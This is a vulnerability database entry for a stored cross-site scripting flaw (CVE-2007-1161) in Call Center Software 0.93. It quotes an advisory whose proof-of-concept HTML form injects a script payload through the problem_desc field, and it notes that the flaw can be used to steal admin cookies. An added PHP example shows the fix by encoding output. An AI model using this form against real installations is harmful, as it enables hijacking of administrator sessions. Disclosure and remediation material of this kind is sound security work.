Call Center Software call_entry.php Cross-Site Scripting Vulnerability

Vulnerability ID: 1191469
Vulnerability type: Cross-site scripting
Published: 2007-03-02
Updated: 2007-03-02
CVE ID: CVE-2007-1161
CNNVD-ID: CNNVD-200703-097
Platform: N/A
CVSS score: 4.3
|Vulnerability source
https://www.securityfocus.com/bid/81904
https://cxsecurity.com/issue/WLB-2007030031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-097
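|Vulnerability details
A cross-site scripting vulnerability exists in call_entry.php in Call Center Software version 0,93. Remote attackers can inject arbitrary web script or HTML via the problem_desc parameter.
|Exploit (EXP)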
-=[--------------------ADVISORY-------------------]=-
                                              
                       Call center 0,93
                                               
  Author: CorryL    [corryl80 (at) gmail (dot) com]
-=[-----------------------------------------------]=-

-=[+] Application:    Call center
-=[+] Version:        0,93
-=[+] Vendor's URL:   http://www.call-center-software.org/ 
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.xoned.net 
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck

..::[ Description ]::..

Call center software is one of the most important aspects of any call help center;
being able to track and manage calls can be the key to high customer satisfaction.
Our 100% free call center software solution is based on php and the mysql database.

..::[ Bug ]::..

An attacker exploiting this vulnerability is able to steal the content of
the cookies of the admin user. In fact, the bug is situated in a POST request,
so it remains stored inside the database, waiting until the admin
goes to read the content of the call.

..::[Exploit]::..

<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>

<body>
<table bgcolor="#FFFFFF" width="100%">
	<tr>
		<td align="center">
			<form method="post" action="http://remote_server/path/call_entry.php">
			<table border="0">
				<tr>
					<th class="ttitle">Adding Call</th>
				</tr>
				<tr>
					<td>
						<table width="100%" border="0" cellspacing="0" cellpadding="3">
							<tr>
								<td align="right">Name:</td><td align="left"><input type="text" name="name" value="H4ck3r" size="30"></td>
							</tr>
							<tr>
								<td align="right">Phone:</td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td>
							</tr>
							<tr>
								<td align="right">Department:</td>
								<td>
									<select name="department_id">
										<option value="1">Problem</option>
									</select>
								</td>
							</tr>
							<tr>
								<td align="right">Issue Type:</td>
								<td>
									<select name="issue_id">
										<option value="6">email</option>
										<option value="2">keyboard</option>
										<option value="3">monitor</option>
										<option value="5">mouse</option>
										<option value="4">network</option>
										<option value="8">password</option>
										<option value="7">word processing</option>
									</select>
								</td>
							</tr>
							<tr>
								<td align="right" valign="top">Xss Script Here :</td>
								<td align="left"><input type="text" name="problem_desc" value="<body onload=alert(1395499912)>" size="50"></td>
							</tr>
							<tr>
								<td></td><td><input type="submit" name="submit" value="Add" class="button"></td>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			</form>
		</td>
	</tr>	
</table>
</body>
</html>
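
The stored problem_desc value only becomes script when the call record is written back into the admin's page without encoding. The following PHP is an added example, not code from the advisory or from Call Center Software: it contrasts an unencoded render of a stored record with an output-encoded one. The function names, the `$call` row layout and the ISO-8859-1 page charset (taken from the form's meta tag) are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical names throughout: this is not Call Center Software's code.
// Assumption: pages are served as ISO-8859-1, as the form's meta tag declares.
const PAGE_CHARSET = 'ISO-8859-1';

// Constructed sample row: a call record as it would come back from the
// database, with problem_desc saved exactly as it was submitted.
$call = [
    'name'         => 'H4ck3r',
    'phone'        => '111-555-555',
    'problem_desc' => '<body onload=alert(1395499912)>',
];

// Vulnerable pattern: the stored value is concatenated into the page as-is,
// so the browser parses it as markup when the admin opens the call.
function render_call_unsafe(array $call): string
{
    return '<tr><td>Problem:</td><td>' . $call['problem_desc'] . '</td></tr>';
}

// Encode for the HTML context at output time. ENT_QUOTES also covers values
// that end up inside quoted attributes.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, PAGE_CHARSET);
}

// Hardened pattern: every stored field passes through h() before output.
function render_call_safe(array $call): string
{
    return '<tr><td>Problem:</td><td>' . h($call['problem_desc']) . '</td></tr>';
}

$unsafe = render_call_unsafe($call);
$safe   = render_call_safe($call);

// The unsafe row still carries a live tag; the safe row must not.
if (strpos($safe, '<body') !== false) {
    throw new RuntimeException('problem_desc was not encoded');
}

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";
```

Encoding at output time, rather than only filtering at input, also neutralises rows that were stored before the fix was deployed.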
|Affected products
Call Center Software Call Center Software 0.93
|References

Source: BUGTRAQ
Name: 20070221CallCenterSoftware-RemoteXssPostExploit-
Link: http://www.securityfocus.com/archive/1/archive/1/460797/100/0/threaded
Source: VIM
Name: 20070222[TRUE]CallCenterSoftware-RemoteXssPostExploit-
Link: http://www.attrition.org/pipermail/vim/2007-February/001378.html
Source: SREASON
Name: 2333
Link: http://securityreason.com/securityalert/2333
Source: OSVDB
Name: 33037
Link: http://osvdb.org/33037